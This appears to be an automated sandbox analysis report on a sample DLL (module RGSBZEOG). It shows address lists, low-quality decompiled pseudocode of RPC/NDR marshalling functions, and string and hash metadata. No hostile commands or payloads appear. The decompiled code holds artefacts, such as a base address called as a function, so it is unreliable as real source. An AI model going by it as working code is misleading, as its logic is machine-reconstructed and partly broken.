                                                                                              0x6f70982c
                                                                                              0x6f70982f
                                                                                              0x6f709832
                                                                                              0x6f709835
                                                                                              0x6f709838
                                                                                              0x6f70983f
                                                                                              0x6f709860
                                                                                              0x6f709863
                                                                                              0x6f709869
                                                                                              0x6f709871
                                                                                              0x6f709876
                                                                                              0x6f709841
                                                                                              0x6f709841
                                                                                              0x6f709844
                                                                                              0x6f709847
                                                                                              0x6f70984a
                                                                                              0x6f70984d
                                                                                              0x6f709850
                                                                                              0x6f709857
                                                                                              0x6f709857
                                                                                              0x6f709879
                                                                                              0x6f709879
                                                                                              0x6f70987e
                                                                                              0x6f709882
                                                                                              0x6f709885
                                                                                              0x6f709888
                                                                                              0x6f70988c
                                                                                              0x6f709890
                                                                                              0x6f709894
                                                                                              0x6f7098a0
                                                                                              0x6f709935
                                                                                              0x6f709935
                                                                                              0x6f709938
                                                                                              0x6f70993e
                                                                                              0x6f70994e
                                                                                              0x6f709951
                                                                                              0x6f709940
                                                                                              0x6f709940
                                                                                              0x6f709943
                                                                                              0x6f709946
                                                                                              0x6f709946
                                                                                              0x6f709957
                                                                                              0x6f70995a
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a6
                                                                                              0x6f7098a9
                                                                                              0x6f7098ac
                                                                                              0x6f7098ad
                                                                                              0x6f7098b0
                                                                                              0x6f7098b2
                                                                                              0x6f7098b8
                                                                                              0x6f7098bb
                                                                                              0x6f7098bc
                                                                                              0x6f7098c1
                                                                                              0x6f7098c6
                                                                                              0x6f7098c9
                                                                                              0x6f7098cc
                                                                                              0x6f7098ce
                                                                                              0x6f7098d1
                                                                                              0x6f7098d4
                                                                                              0x6f7098d7
                                                                                              0x6f7098dd
                                                                                              0x6f7098df
                                                                                              0x6f7098e2
                                                                                              0x6f7098e4
                                                                                              0x6f7098e7
                                                                                              0x6f7098ea
                                                                                              0x6f7098ed
                                                                                              0x6f7098f3
                                                                                              0x6f7098f5
                                                                                              0x6f7098f6
                                                                                              0x6f7098fb
                                                                                              0x6f709900
                                                                                              0x6f709900
                                                                                              0x6f709903
                                                                                              0x6f709903
                                                                                              0x6f709907
                                                                                              0x6f70990a
                                                                                              0x6f70990d
                                                                                              0x6f709910
                                                                                              0x6f709913
                                                                                              0x6f709916
                                                                                              0x6f709919
                                                                                              0x6f70991c
                                                                                              0x6f70991f
                                                                                              0x6f709925
                                                                                              0x6f709929
                                                                                              0x6f70992d
                                                                                              0x6f709932
                                                                                              0x00000000
                                                                                              0x6f709925
                                                                                              0x00000000
                                                                                              0x6f709962
                                                                                              0x6f709964
                                                                                              0x6f709968
                                                                                              0x6f70996c
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709979
                                                                                              0x6f70997b
                                                                                              0x6f70997f
                                                                                              0x6f709983
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x6f709990
                                                                                              0x6f709992
                                                                                              0x6f70999a
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f7099d4
                                                                                              0x6f7099d9
                                                                                              0x6f7099dc
                                                                                              0x6f7099e3
                                                                                              0x6f7099e6
                                                                                              0x6f7099ec
                                                                                              0x6f7099ef
                                                                                              0x6f7099f2
                                                                                              0x6f7099f8
                                                                                              0x6f7099fb
                                                                                              0x6f7099fe
                                                                                              0x6f709a02
                                                                                              0x6f709a0e
                                                                                              0x6f709a11
                                                                                              0x6f709a14
                                                                                              0x6f709a15
                                                                                              0x6f709a18
                                                                                              0x6f709a19
                                                                                              0x6f709a1e
                                                                                              0x6f709a23
                                                                                              0x6f709a26
                                                                                              0x6f709a2c
                                                                                              0x6f709a2e
                                                                                              0x6f709a34
                                                                                              0x6f709a38
                                                                                              0x6f709a3d
                                                                                              0x6f709a40
                                                                                              0x6f709a43
                                                                                              0x6f709a46
                                                                                              0x6f709a49
                                                                                              0x6f709a50
                                                                                              0x6f709a57
                                                                                              0x6f709a8a
                                                                                              0x6f709a8d
                                                                                              0x6f709a90
                                                                                              0x6f709a91
                                                                                              0x6f709a96
                                                                                              0x6f709a9b
                                                                                              0x6f709a59
                                                                                              0x6f709a59
                                                                                              0x6f709a5c
                                                                                              0x6f709a62
                                                                                              0x6f709a77
                                                                                              0x6f709a79
                                                                                              0x6f709a7c
                                                                                              0x6f709a7d
                                                                                              0x6f709a80
                                                                                              0x6f709a81
                                                                                              0x6f709a84
                                                                                              0x6f709a85
                                                                                              0x6f709a64
                                                                                              0x6f709a64
                                                                                              0x6f709a66
                                                                                              0x6f709a69
                                                                                              0x6f709a6a
                                                                                              0x6f709a6d
                                                                                              0x6f709a6e
                                                                                              0x6f709a71
                                                                                              0x6f709a72
                                                                                              0x6f709a72
                                                                                              0x6f709a88
                                                                                              0x6f709a9e
                                                                                              0x6f709aa1
                                                                                              0x6f709aa4
                                                                                              0x6f709aaa
                                                                                              0x6f709aad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f709ab5
                                                                                              0x6f709acb
                                                                                              0x6f709acb
                                                                                              0x6f709ad1
                                                                                              0x00000000
                                                                                              0x6f709ad4
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$p<po$pointer => %p$short=%d => %p
                                                                                              • API String ID: 2102423945-1117049768
                                                                                              • Opcode ID: 97a231d21420f43f7729c450aa766a1ded4889bf0a6ef5eb19cc5326961b59c0
                                                                                              • Instruction ID: 903cd941327a6577c14f1d89d4ccfe07ab2afd7da77dfa6686bc540a21c1484b
                                                                                              • Opcode Fuzzy Hash: 97a231d21420f43f7729c450aa766a1ded4889bf0a6ef5eb19cc5326961b59c0
                                                                                              • Instruction Fuzzy Hash: 8FC11CF5A00209AFDB04DF54DA90EAA77B5BF99314F04C169F9198F385D731EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E6F703840(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				signed char* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				char _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr* _t124;
                                                                                              				void* _t126;
                                                                                              				intOrPtr _t129;
                                                                                              				void* _t134;
                                                                                              				void* _t198;
                                                                                              				void* _t199;
                                                                                              				void* _t200;
                                                                                              				void* _t201;
                                                                                              				void* _t204;
                                                                                              
                                                                                              				_v8 = _a12;
                                                                                              				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t201 = _t200 + 0x14;
                                                                                              				_a12 = _a12 + 6;
                                                                                              				if(( *_v8 & 0x000000ff) == 0x19) {
                                                                                              					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                              					_v28 = E6F70D650( *_v12 & 0x000000ff, _a4, _v12);
                                                                                              					E6F7073D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                              					0x6f700000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                              					_t204 = _t201 + 0x1c;
                                                                                              					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              						_a16 = 1;
                                                                                              					}
                                                                                              					if((_a16 & 0x000000ff) != 0) {
                                                                                              						_v32 = (_v8[2] & 0x0000ffff) + _v28;
                                                                                              						_t129 = E6F70A3B0(_v32, _a4, _v32);
                                                                                              						_t204 = _t204 + 8;
                                                                                              						 *_a8 = _t129;
                                                                                              					}
                                                                                              					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                              					E6F70AF00(_a4, _v8[2] & 0x0000ffff);
                                                                                              					_v36 = (_v8[2] & 0x0000ffff) +  *_a8;
                                                                                              					_v20 = E6F70D830(_t134, _t198, _t199,  *_v12 & 0x000000ff, _a4,  &_v36, _v12, 0, 0, 0);
                                                                                              					_v40 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 4));
                                                                                              					E6F70AF00(_a4, _v20);
                                                                                              					E6F70C2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              					E6F7100E0( *_a8, _v16, _v8[2] & 0x0000ffff);
                                                                                              					0x6f700000("copying %p to %p\n", _v24, (_v8[2] & 0x0000ffff) +  *_a8);
                                                                                              					E6F7100E0( *_a8 + (_v8[2] & 0x0000ffff) + _v40, _v24, _v20);
                                                                                              					if(( *_v12 & 0x000000ff) != 0x22) {
                                                                                              						if(( *_v12 & 0x000000ff) == 0x25) {
                                                                                              							_t124 = _a8;
                                                                                              							0x6f700000((_v8[2] & 0x0000ffff) +  *_t124);
                                                                                              							0x6f700000("string=%s\n", _t124);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t126 = (_v8[2] & 0x0000ffff) +  *_a8;
                                                                                              						0x6f700000(_t126);
                                                                                              						0x6f700000("string=%s\n", _t126);
                                                                                              					}
                                                                                              					return 0;
                                                                                              				}
                                                                                              				0x6f700000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                              				 *0x6f700000(0x6e6);
                                                                                              				return 0;
                                                                                              			}






















                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x$memory_size = %d$string=%s$string=%s
                                                                                              • API String ID: 0-4074488482
                                                                                              • Opcode ID: 4fb196c9b8c61470dffb2ac1418f2f9327a9efbc37800639119e17da8c3afebb
                                                                                              • Instruction ID: 587929ce94ee4d7021ae4766fdcdf9874cf5629e303050f0600837f5d62d6d29
                                                                                              • Opcode Fuzzy Hash: 4fb196c9b8c61470dffb2ac1418f2f9327a9efbc37800639119e17da8c3afebb
                                                                                              • Instruction Fuzzy Hash: E2814BF5A00208AFCB04DF98D981EAEB7F5BF88305F148199F8499B345D734EA50DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 29%
                                                                                              			E6F703600(intOrPtr _a4, signed int* _a8, signed char* _a12, signed int _a16) {
                                                                                              				signed char* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				signed char* _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _t94;
                                                                                              				intOrPtr _t98;
                                                                                              				signed int _t115;
                                                                                              				signed char* _t135;
                                                                                              				signed char* _t163;
                                                                                              				void* _t181;
                                                                                              				void* _t182;
                                                                                              				void* _t186;
                                                                                              				void* _t187;
                                                                                              
                                                                                              				_v8 = _a12;
                                                                                              				0x6f700000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				_t182 = _t181 + 0x14;
                                                                                              				_a12 = _a12 + 6;
                                                                                              				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
                                                                                              					0x6f700000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                              					 *0x6f700000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_v16 =  &(_v8[_v8[4] + 4]);
                                                                                              				__eflags = ( *_v16 & 0x000000ff) - 0x1b;
                                                                                              				if(__eflags == 0) {
                                                                                              					_v24 = _v16[2] & 0x0000ffff;
                                                                                              					_v16 = E6F70A460( &(_v16[4]), __eflags, _a4,  &(_v16[4]));
                                                                                              					E6F7073D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                              					0x6f700000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                              					_t94 = E6F70AEC0(_v24,  *((intOrPtr*)(_a4 + 0x3c)));
                                                                                              					_t186 = _t182 + 0x20;
                                                                                              					_v12 = _t94;
                                                                                              					_t163 = _v8;
                                                                                              					_t135 = _v8;
                                                                                              					__eflags = ( *(_t163 + 2) & 0x0000ffff) + _v12 - ( *(_t135 + 2) & 0x0000ffff);
                                                                                              					if(( *(_t163 + 2) & 0x0000ffff) + _v12 < ( *(_t135 + 2) & 0x0000ffff)) {
                                                                                              						0x6f700000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v12);
                                                                                              						_t186 = _t186 + 0xc;
                                                                                              						 *0x6f700000(0x6f7);
                                                                                              					}
                                                                                              					__eflags = _a16 & 0x000000ff;
                                                                                              					if((_a16 & 0x000000ff) == 0) {
                                                                                              						_t98 = _a4;
                                                                                              						__eflags =  *(_t98 + 0x20) & 0x000000ff;
                                                                                              						if(( *(_t98 + 0x20) & 0x000000ff) == 0) {
                                                                                              							__eflags =  *_a8;
                                                                                              							if( *_a8 == 0) {
                                                                                              								 *_a8 =  *(_a4 + 4);
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_v28 = (_v8[2] & 0x0000ffff) + _v12;
                                                                                              						_t115 = E6F70A3B0(_a4, _a4, _v28);
                                                                                              						_t186 = _t186 + 8;
                                                                                              						 *_a8 = _t115;
                                                                                              					}
                                                                                              					 *(_a4 + 0x10) =  *(_a4 + 4);
                                                                                              					_v20 =  *(_a4 + 0x10);
                                                                                              					E6F70AF00(_a4, (_v8[2] & 0x0000ffff) + _v12);
                                                                                              					_t187 = _t186 + 8;
                                                                                              					__eflags = ( *_v8 & 0x000000ff) - 0x18;
                                                                                              					if(( *_v8 & 0x000000ff) == 0x18) {
                                                                                              						E6F70C2B0(_a4, _v20,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                              						_t187 = _t187 + 0x14;
                                                                                              					}
                                                                                              					0x6f700000("copying %p to %p\n", _v20,  *_a8);
                                                                                              					__eflags =  *_a8 - _v20;
                                                                                              					if( *_a8 != _v20) {
                                                                                              						__eflags = (_v8[2] & 0x0000ffff) + _v12;
                                                                                              						E6F7100E0( *_a8, _v20, (_v8[2] & 0x0000ffff) + _v12);
                                                                                              					}
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					0x6f700000("invalid array format type %x\n",  *_v8 & 0x000000ff);
                                                                                              					 *0x6f700000(0x6e6);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}



















                                                                                              Strings
                                                                                              • (%p, %p, %p, %d), xrefs: 6F70361D
                                                                                              • integer overflow of memory_size %u with bufsize %u, xrefs: 6F703737
                                                                                              • memory_size = %d, xrefs: 6F7036F3
                                                                                              • copying %p to %p, xrefs: 6F7037F9
                                                                                              • invalid format type %x, xrefs: 6F703650
                                                                                              • invalid array format type %x, xrefs: 6F703692
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (%p, %p, %p, %d)$copying %p to %p$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                              • API String ID: 0-1713900660
                                                                                              • Opcode ID: 6313d1e1b1ae0911d4c0cf20c0d576a1b40d81a55adbffdbea9c2d8fbb8f769e
                                                                                              • Instruction ID: a8c291c57fe89a896ec103c91c5adebffb738448362acca50218a44b0918344a
                                                                                              • Opcode Fuzzy Hash: 6313d1e1b1ae0911d4c0cf20c0d576a1b40d81a55adbffdbea9c2d8fbb8f769e
                                                                                              • Instruction Fuzzy Hash: 35716CB5A00108AFCB44DF98D991DAEBBF2BF89305F148199F8599B345D730EE50DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E6F708850(intOrPtr* _a4, intOrPtr* _a8, signed char* _a12, signed char _a16) {
                                                                                              				intOrPtr* _v8;
                                                                                              				char* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				signed char* _t49;
                                                                                              				signed char* _t76;
                                                                                              				void* _t87;
                                                                                              				void* _t88;
                                                                                              
                                                                                              				if((_a16 & 0x000000ff) == 0) {
                                                                                              					_v12 = "FALSE";
                                                                                              				} else {
                                                                                              					_v12 = "TRUE";
                                                                                              				}
                                                                                              				0x6f700000("pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s\n", _a4, _a8, _a12, _v12);
                                                                                              				_t88 = _t87 + 0x14;
                                                                                              				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                              					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					_t88 = _t88 + 8;
                                                                                              					 *0x6f700000(0x6e6);
                                                                                              				}
                                                                                              				0x6f700000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
                                                                                              				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
                                                                                              					_v16 = E6F704BC0(__eflags, _a4, _a12);
                                                                                              					_t76 = _a12;
                                                                                              					__eflags =  *(_t76 + (1 << 0)) & 0x80;
                                                                                              					if(( *(_t76 + (1 << 0)) & 0x80) == 0) {
                                                                                              						 *_a8 =  *((intOrPtr*)(_v16 + 8));
                                                                                              					} else {
                                                                                              						 *_a8 = _v16 + 8;
                                                                                              					}
                                                                                              				} else {
                                                                                              					if((_a12[1] & 0x80) == 0) {
                                                                                              						_v8 = _a8;
                                                                                              					} else {
                                                                                              						_v8 =  *_a8;
                                                                                              					}
                                                                                              					_t49 = _a12;
                                                                                              					_t94 = (_t49[1] & 0x60) - 0x20;
                                                                                              					if((_t49[1] & 0x60) == 0x20) {
                                                                                              						 *_v8 = 0;
                                                                                              					}
                                                                                              					E6F7049D0(_t94, _a4, _v8,  *((intOrPtr*)( *_a4)));
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}











                                                                                              APIs
                                                                                              • _NdrClientContextUnmarshall@12.RGSBZEOG(?,?,00000001), ref: 6F708934
                                                                                              • _NdrServerContextNewUnmarshall@8.RGSBZEOG(?,?), ref: 6F708943
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Context$ClientServerUnmarshall@12Unmarshall@8
                                                                                              • String ID: FALSE$TRUE$flags: 0x%02x$invalid format type %x$pStubMsg %p, ppMemory %p, pFormat %p, fMustAlloc %s
                                                                                              • API String ID: 4170269409-3585304320
                                                                                              • Opcode ID: 6610662d13564ef16fd2101ce1e43688208de129adfa57b87dd10f287e376360
                                                                                              • Instruction ID: abab234b44b245c3b276439a62035c71e8c863e267b4d7ce8e1d388c6fc8350b
                                                                                              • Opcode Fuzzy Hash: 6610662d13564ef16fd2101ce1e43688208de129adfa57b87dd10f287e376360
                                                                                              • Instruction Fuzzy Hash: 7B4183B56042889FDB04DF55C950FAE7BF1FF8A301F108169F8658B384C635EA50CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _NdrComplexArrayBufferSize@12.RGSBZEOG(?,?,?), ref: 6F701B9D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ArrayBufferComplexSize@12
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x$invalid format type %x
                                                                                              • API String ID: 3462415225-3633984987
                                                                                              • Opcode ID: c949ae040e626fc3577bc8516682a5f886fc54cbb74d8f04c22afcfd48f3f8ab
                                                                                              • Instruction ID: 291483899197efe0ea066f7196d8e520295e39e90493a31e2b006c5172923bb0
                                                                                              • Opcode Fuzzy Hash: c949ae040e626fc3577bc8516682a5f886fc54cbb74d8f04c22afcfd48f3f8ab
                                                                                              • Instruction Fuzzy Hash: 0571E8B8600209EFCB08DF58D594EAABBB1FF88354F15C158ED498B355D771EA81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 21%
                                                                                              			E6F701440(void* _a4, signed int* _a8, signed short* _a12) {
                                                                                              				signed char* _v8;
                                                                                              				signed char* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _t147;
                                                                                              				signed short* _t162;
                                                                                              				intOrPtr _t225;
                                                                                              				void* _t262;
                                                                                              				void* _t263;
                                                                                              				void* _t264;
                                                                                              				void* _t265;
                                                                                              
                                                                                              				_v8 = 0;
                                                                                              				_v12 = 0;
                                                                                              				_v44 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                              				_v28 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v24 = 0;
                                                                                              				0x6f700000("(%p,%p,%p)\n", _a4, _a8, _a12);
                                                                                              				_t263 = _t262 + 0x10;
                                                                                              				_t225 = _a4;
                                                                                              				_t267 =  *((intOrPtr*)(_t225 + 0x34));
                                                                                              				if( *((intOrPtr*)(_t225 + 0x34)) == 0) {
                                                                                              					_v32 =  *((intOrPtr*)(_a4 + 0x30));
                                                                                              					_v36 =  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) =  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8));
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = 1;
                                                                                              					E6F705070(_t267, _a4, _a8, _a12);
                                                                                              					 *((intOrPtr*)(_a4 + 0x30)) = _v32;
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14));
                                                                                              					0x6f700000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 0x34)) -  *((intOrPtr*)(_a4 + 4)));
                                                                                              					_t263 = _t263 + 8;
                                                                                              					_v28 = 1;
                                                                                              					 *((intOrPtr*)(_a4 + 0x14)) = _v36;
                                                                                              				}
                                                                                              				E6F707400(_a4 + 4, _a4 + 4, ( *(_a12 + (1 << 0)) & 0x000000ff) + 1);
                                                                                              				_t264 = _t263 + 8;
                                                                                              				_a12 =  &(_a12[2]);
                                                                                              				if( *_a12 != 0) {
                                                                                              					_v8 = _a12 +  *_a12;
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				if(( *_a12 & 0x0000ffff) != 0) {
                                                                                              					_v12 = _a12 + ( *_a12 & 0x0000ffff);
                                                                                              				}
                                                                                              				_a12 =  &(_a12[1]);
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _a8;
                                                                                              				if(_v8 != 0) {
                                                                                              					_t162 = _a12;
                                                                                              					0x6f700000(_a4, _t162);
                                                                                              					_v40 = _t162;
                                                                                              					E6F70D120( *_v8 & 0x000000ff, _a4, _a8 + _v40, _v8);
                                                                                              					_t264 = _t264 + 0x18;
                                                                                              					_v16 =  *((intOrPtr*)(_a4 + 0x3c));
                                                                                              					_v20 =  *((intOrPtr*)(_a4 + 0x44));
                                                                                              					_v24 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                              				}
                                                                                              				_t147 = E6F708F30(_a4, _a8, _a12, _v12);
                                                                                              				_t265 = _t264 + 0x10;
                                                                                              				_a8 = _t147;
                                                                                              				if(_v8 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 0x3c)) = _v16;
                                                                                              					 *((intOrPtr*)(_a4 + 0x44)) = _v20;
                                                                                              					 *((intOrPtr*)(_a4 + 0x40)) = _v24;
                                                                                              					E6F70D360( *_v8 & 0x000000ff, _a4, _a8, _v8, 1);
                                                                                              					_t265 = _t265 + 0x14;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 0x1c)) = _v44;
                                                                                              				if(_v28 != 0) {
                                                                                              					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              				}
                                                                                              				do {
                                                                                              					0x6f700000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              					_t265 = _t265 + 0xc;
                                                                                              					if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                              						0x6f700000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              						_t265 = _t265 + 8;
                                                                                              					}
                                                                                              				} while (0 != 0);
                                                                                              				return 0;
                                                                                              			}

                                                                                              APIs
                                                                                              • _NdrComplexStructBufferSize@12.RGSBZEOG(00000000,00000000,00000000), ref: 6F7014DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
